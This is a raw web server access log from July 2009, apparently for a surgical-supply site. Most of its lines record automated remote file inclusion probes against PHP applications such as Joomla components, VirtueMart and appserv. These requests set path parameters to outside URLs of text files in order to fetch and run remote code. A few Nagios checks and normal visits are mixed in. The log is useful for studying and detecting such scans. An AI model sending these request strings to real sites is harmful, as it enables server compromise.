83.13.191.186 - - [10/Jul/2009:00:03:51 -0400] "GET /logs//index2.php?id=/xnovade/login.php//includes/todofleetcontrol.php?ugamela_root_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:00:03:51 -0400] "GET //index2.php?id=/xnovade/login.php//includes/todofleetcontrol.php?ugamela_root_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:00:03:51 -0400] "GET /logs/access_log.Q109062200%20%20//index2.php?id=/xnovade/login.php//includes/todofleetcontrol.php?ugamela_root_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
61.250.85.185 - - [10/Jul/2009:00:03:54 -0400] "GET /option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.camaramunicipaluniao.com.br/editor/images/Image/idxx.txt? HTTP/1.1" 404 338 "-" "Mozilla/5.0"
61.250.85.185 - - [10/Jul/2009:00:03:54 -0400] "GET /logs/option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.camaramunicipaluniao.com.br/editor/images/Image/idxx.txt? HTTP/1.1" 404 343 "-" "Mozilla/5.0"
61.250.85.185 - - [10/Jul/2009:00:03:54 -0400] "GET /logs/access_log.Q109060300/option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.camaramunicipaluniao.com.br/editor/images/Image/idxx.txt? HTTP/1.1" 404 365 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:00:04:08 -0400] "GET /logs/access_log.Q109060600%20%20//index2.php?id=/xnovade/login.php//includes/todofleetcontrol.php?ugamela_root_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:00:04:09 -0400] "GET /logs/access_log.Q109051400//appserv/main.php?appserv_root=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:00:04:09 -0400] "GET /logs//appserv/main.php?appserv_root=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:00:04:09 -0400] "GET //appserv/main.php?appserv_root=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:00:04:10 -0400] "GET /logs/access_log.Q109060600%20%20//index2.php?id=/xnovade/login.php//includes/todofleetcontrol.php?ugamela_root_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:00:04:23 -0400] "GET /logs//index2.php?id=/xnovade/login.php//includes/todofleetcontrol.php?ugamela_root_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:00:04:23 -0400] "GET //index2.php?id=/xnovade/login.php//includes/todofleetcontrol.php?ugamela_root_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:00:04:23 -0400] "GET /logs/access_log.Q109062200//index2.php?id=/xnovade/login.php//includes/todofleetcontrol.php?ugamela_root_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
124.0.146.100 - - [10/Jul/2009:00:04:24 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
124.0.146.100 - - [10/Jul/2009:00:04:24 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
124.0.146.100 - - [10/Jul/2009:00:04:25 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
61.250.85.185 - - [10/Jul/2009:00:04:28 -0400] "GET /logs/access_log.Q109050900/option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.camaramunicipaluniao.com.br/editor/images/Image/idxx.txt? HTTP/1.1" 404 365 "-" "Mozilla/5.0"
61.250.85.185 - - [10/Jul/2009:00:04:32 -0400] "GET /logs/access_log.Q109050900/option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.camaramunicipaluniao.com.br/editor/images/Image/idxx.txt? HTTP/1.1" 404 365 "-" "Mozilla/5.0"
89.234.63.107 - - [10/Jul/2009:00:04:37 -0400] "GET /logs/access_log.Q109060300%20%20/option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://mmemba.org/mambots/idxx.txt?? HTTP/1.1" 404 334 "-" "Mozilla/5.0"
89.234.63.107 - - [10/Jul/2009:00:04:40 -0400] "GET /logs/access_log.Q109050900%20%20/option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://mmemba.org/mambots/idxx.txt?? HTTP/1.1" 404 334 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:00:04:40 -0400] "GET /logs/access_log.Q109060600//index2.php?id=/xnovade/login.php//includes/todofleetcontrol.php?ugamela_root_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:00:04:45 -0400] "GET /logs/access_log.Q109062400%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
217.65.100.23 - - [10/Jul/2009:00:04:49 -0400] "GET /index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://mmemba.org/mambots/perkosa.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
217.65.100.23 - - [10/Jul/2009:00:04:49 -0400] "GET /logs/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://mmemba.org/mambots/perkosa.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
217.65.100.23 - - [10/Jul/2009:00:04:49 -0400] "GET /logs/access_log.Q109061100/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://mmemba.org/mambots/perkosa.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
217.65.100.23 - - [10/Jul/2009:00:04:50 -0400] "GET /logs/access_log.Q109051300/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://mmemba.org/mambots/perkosa.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
216.117.128.143 - - [10/Jul/2009:00:04:54 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.nationalmediterannee-auto.com//administrator/components/com_virtuemart/classes/shipping/minixml/mawar.txt?????? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
216.117.128.143 - - [10/Jul/2009:00:04:54 -0400] "GET /logs/access_log.Q109062800%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.nationalmediterannee-auto.com//administrator/components/com_virtuemart/classes/shipping/minixml/mawar.txt?????? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
216.117.128.143 - - [10/Jul/2009:00:04:54 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.nationalmediterannee-auto.com//administrator/components/com_virtuemart/classes/shipping/minixml/mawar.txt?????? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:00:05:28 -0400] "GET /logs/access_log.Q109070100%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
216.117.128.143 - - [10/Jul/2009:00:05:38 -0400] "GET /logs/access_log.Q109062800%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.nationalmediterannee-auto.com//administrator/components/com_virtuemart/classes/shipping/minixml/mawar.txt?????? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
216.117.128.143 - - [10/Jul/2009:00:05:38 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.nationalmediterannee-auto.com//administrator/components/com_virtuemart/classes/shipping/minixml/mawar.txt?????? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.117.128.143 - - [10/Jul/2009:00:05:39 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.nationalmediterannee-auto.com//administrator/components/com_virtuemart/classes/shipping/minixml/mawar.txt?????? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.188.129.126 - - [10/Jul/2009:00:05:42 -0400] "GET /index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://mmemba.org/mambots/perkosa.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
89.188.129.126 - - [10/Jul/2009:00:05:42 -0400] "GET /logs/access_log.Q109061100/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://mmemba.org/mambots/perkosa.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
89.188.129.126 - - [10/Jul/2009:00:05:42 -0400] "GET /logs/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://mmemba.org/mambots/perkosa.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
89.188.129.126 - - [10/Jul/2009:00:05:42 -0400] "GET /logs/access_log.Q109051300/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://mmemba.org/mambots/perkosa.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
76.12.17.218 - - [10/Jul/2009:00:06:04 -0400] "GET /logs/access_log.Q109052900//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.822"
76.12.17.218 - - [10/Jul/2009:00:06:04 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.822"
76.12.17.218 - - [10/Jul/2009:00:06:04 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.822"
114.200.199.144 - - [10/Jul/2009:00:06:08 -0400] "GET /logs/access_log.Q109061200//includes/ktedit/toolbar.php?dirDepth=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
69.93.252.132 - - [10/Jul/2009:00:06:42 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://openarmsprojects.org/raid.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.810"
69.93.252.132 - - [10/Jul/2009:00:06:42 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://openarmsprojects.org/raid.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.810"
69.93.252.132 - - [10/Jul/2009:00:06:43 -0400] "GET /logs/access_log.Q109052900//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://openarmsprojects.org/raid.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.810"
217.65.100.23 - - [10/Jul/2009:00:06:56 -0400] "GET /logs/error_log.Q109060100%20/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://mmemba.org/mambots/perkosa.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
69.93.252.132 - - [10/Jul/2009:00:06:58 -0400] "GET /logs/access_log.Q109052900//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.810"
69.93.252.132 - - [10/Jul/2009:00:06:58 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.810"
69.93.252.132 - - [10/Jul/2009:00:06:58 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://imagehut.ws/yes.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.810"
61.250.85.185 - - [10/Jul/2009:00:07:38 -0400] "GET /logs/access_log.Q109060300%20%20/option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.camaramunicipaluniao.com.br/editor/images/Image/idxx.txt? HTTP/1.1" 404 367 "-" "Mozilla/5.0"
61.250.85.185 - - [10/Jul/2009:00:07:54 -0400] "GET /logs/access_log.Q109060300%20%20/option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.camaramunicipaluniao.com.br/editor/images/Image/idxx.txt? HTTP/1.1" 404 367 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jul/2009:00:08:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.188.129.126 - - [10/Jul/2009:00:08:08 -0400] "GET /logs/error_log.Q109060100%20/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://mmemba.org/mambots/perkosa.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
89.188.129.126 - - [10/Jul/2009:00:08:08 -0400] "GET /logs/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://mmemba.org/mambots/perkosa.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
61.250.85.185 - - [10/Jul/2009:00:08:36 -0400] "GET /logs/access_log.Q109050900%20%20/option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.camaramunicipaluniao.com.br/editor/images/Image/idxx.txt? HTTP/1.1" 404 367 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:00:08:40 -0400] "GET //index2.php?id=/xnovade/login.php//includes/todofleetcontrol.php?ugamela_root_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:00:08:40 -0400] "GET /logs//index2.php?id=/xnovade/login.php//includes/todofleetcontrol.php?ugamela_root_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:00:08:40 -0400] "GET /logs/access_log.Q109062200//index2.php?id=/xnovade/login.php//includes/todofleetcontrol.php?ugamela_root_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:00:08:43 -0400] "GET //index2.php?id=/xnovade/login.php//includes/todofleetcontrol.php?ugamela_root_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:00:08:43 -0400] "GET /logs//index2.php?id=/xnovade/login.php//includes/todofleetcontrol.php?ugamela_root_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:00:08:43 -0400] "GET /logs/access_log.Q109062200//index2.php?id=/xnovade/login.php//includes/todofleetcontrol.php?ugamela_root_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
61.250.85.185 - - [10/Jul/2009:00:08:48 -0400] "GET /logs/access_log.Q109050900%20%20/option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.camaramunicipaluniao.com.br/editor/images/Image/idxx.txt? HTTP/1.1" 404 367 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:00:08:55 -0400] "GET /logs/access_log.Q109060600//index2.php?id=/xnovade/login.php//includes/todofleetcontrol.php?ugamela_root_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:00:09:09 -0400] "GET /logs/access_log.Q109060600//index2.php?id=/xnovade/login.php//includes/todofleetcontrol.php?ugamela_root_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.86.17.106 - - [10/Jul/2009:00:09:35 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://openarmsprojects.org/raid.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
74.86.17.106 - - [10/Jul/2009:00:09:35 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://openarmsprojects.org/raid.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
74.86.17.106 - - [10/Jul/2009:00:09:35 -0400] "GET /logs/access_log.Q109052900//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://openarmsprojects.org/raid.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
89.188.129.126 - - [10/Jul/2009:00:09:41 -0400] "GET /logs/error_log.Q109060100%20/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://mmemba.org/mambots/perkosa.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
217.147.29.190 - - [10/Jul/2009:00:10:47 -0400] "GET //appserv/main.php?appserv_root=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
217.147.29.190 - - [10/Jul/2009:00:10:47 -0400] "GET /logs/access_log.Q109051400//appserv/main.php?appserv_root=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
217.147.29.190 - - [10/Jul/2009:00:10:50 -0400] "GET /logs//appserv/main.php?appserv_root=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:00:11:19 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:00:11:19 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:00:11:19 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
217.147.29.190 - - [10/Jul/2009:00:11:30 -0400] "GET /logs/access_log.Q109051800//appserv/main.php?appserv_root=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:00:11:43 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:00:11:43 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:00:11:43 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:00:12:22 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:00:12:22 -0400] "GET /logs/access_log.Q109052700%20%20//yabbse/Sources/Packages.php?sourcedir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:00:12:22 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jul/2009:00:13:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.33.213.7 - - [10/Jul/2009:00:13:22 -0400] "GET /logs/errors.php?error=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.33.213.7 - - [10/Jul/2009:00:13:22 -0400] "GET /errors.php?error=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.150.78.241 - - [10/Jul/2009:00:13:31 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
218.150.78.241 - - [10/Jul/2009:00:13:31 -0400] "GET /logs/access_log.Q109061400/?_SERVER[DOCUMENT_ROOT]=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.150.78.241 - - [10/Jul/2009:00:13:31 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 200 8922 "-" "Mozilla/5.0"
59.24.49.35 - - [10/Jul/2009:00:13:35 -0400] "GET /logs/access_log.Q109052500%20%20/mygallerybrowser.php?myPath=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
66.33.213.7 - - [10/Jul/2009:00:13:37 -0400] "GET /logs/access_log.Q109050800/errors.php?error=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [10/Jul/2009:00:13:43 -0400] "GET /logs/access_log.Q109051400%20%20//appserv/main.php?appserv_root=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
71.238.67.132 - - [10/Jul/2009:00:13:50 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
71.238.67.132 - - [10/Jul/2009:00:13:50 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
71.238.67.132 - - [10/Jul/2009:00:13:51 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
71.238.67.132 - - [10/Jul/2009:00:13:51 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
217.147.29.190 - - [10/Jul/2009:00:14:06 -0400] "GET /logs/access_log.Q109051800%20%20//appserv/main.php?appserv_root=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
59.24.49.35 - - [10/Jul/2009:00:14:22 -0400] "GET /logs/access_log.Q109052500%20%20/mygallerybrowser.php?myPath=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:00:14:54 -0400] "GET /logs/access_log.Q109052800%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
59.24.49.35 - - [10/Jul/2009:00:15:01 -0400] "GET /logs/access_log.Q109062300%20%20/mygallerybrowser.php?myPath=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:00:15:04 -0400] "GET /logs/access_log.Q109060800/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cotrimex.com.br/imagens/fx29id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:00:15:04 -0400] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cotrimex.com.br/imagens/fx29id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:00:15:04 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cotrimex.com.br/imagens/fx29id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:00:15:09 -0400] "GET /logs/access_log.Q109052400/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cotrimex.com.br/imagens/fx29id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:00:15:39 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cotrimex.com.br/imagens/fx29id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:00:15:40 -0400] "GET /logs/access_log.Q109060800/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cotrimex.com.br/imagens/fx29id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:00:15:40 -0400] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cotrimex.com.br/imagens/fx29id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:00:15:45 -0400] "GET /logs/access_log.Q109052400/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cotrimex.com.br/imagens/fx29id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
59.24.49.35 - - [10/Jul/2009:00:15:59 -0400] "GET /logs/access_log.Q109062300%20%20/mygallerybrowser.php?myPath=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
217.147.29.190 - - [10/Jul/2009:00:16:06 -0400] "GET /logs/access_log.Q109051800//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
217.147.29.190 - - [10/Jul/2009:00:16:06 -0400] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
217.147.29.190 - - [10/Jul/2009:00:16:06 -0400] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
217.147.29.190 - - [10/Jul/2009:00:16:11 -0400] "GET /logs/access_log.Q109061600//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jul/2009:00:18:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.254.32.2 - - [10/Jul/2009:00:18:08 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:00:18:08 -0400] "GET /logs/access_log.Q109061800//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:00:18:09 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:00:18:47 -0400] "GET /logs/access_log.Q109052700//yabbse/Sources/Packages.php?sourcedir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
66.249.68.70 - - [10/Jul/2009:00:19:14 -0400] "GET /images/items/0032328_thumb.jpg HTTP/1.1" 200 2499 "-" "Googlebot-Image/1.0"
